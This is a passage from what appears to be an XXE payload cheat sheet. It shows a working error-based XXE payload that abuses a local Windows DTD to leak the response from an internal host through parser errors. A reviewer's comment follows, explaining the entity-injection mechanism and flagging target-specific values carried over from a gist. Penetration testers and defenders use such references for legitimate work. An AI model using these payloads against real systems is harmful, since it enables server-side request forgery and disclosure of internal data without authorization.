%local_dtd;
]><xxx>cacat</xxx>
```
### Disclose HTTP Response:
```xml
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY % file SYSTEM "https://erp.company.com">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>">
%eval;
%error;
<!ENTITY test "test"'
>
%local_dtd;
]><xxx>cacat</xxx>
```
## XXE in exotic files
### XXE inside SVG
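Review bot: `file://D:\webserv2\services\web.config` and `https://erp.company.com` are target-specific values carried over from the linked gist; replace them with placeholders (`<path-to-file>`, `https://<internal-host>`) so readers do not take them for part of the technique. The `file:///C:\Windows\System32\wbem\xml\cim20.dtd` URI mixes slash styles (forward slashes work for Windows file URIs), and `### Disclose HTTP Response:` should lose the trailing colon to match `### Disclose local file`. One sentence on the mechanism would make the section usable without opening the gist: the local `cim20.dtd` references the `%SuperClass;` parameter entity, so redefining `SuperClass` to the string beginning with `'>` injects the nested `%eval;`/`%error;` declarations, and the file or response content is reflected in the parser's error for the invalid `file://t/#...` URI.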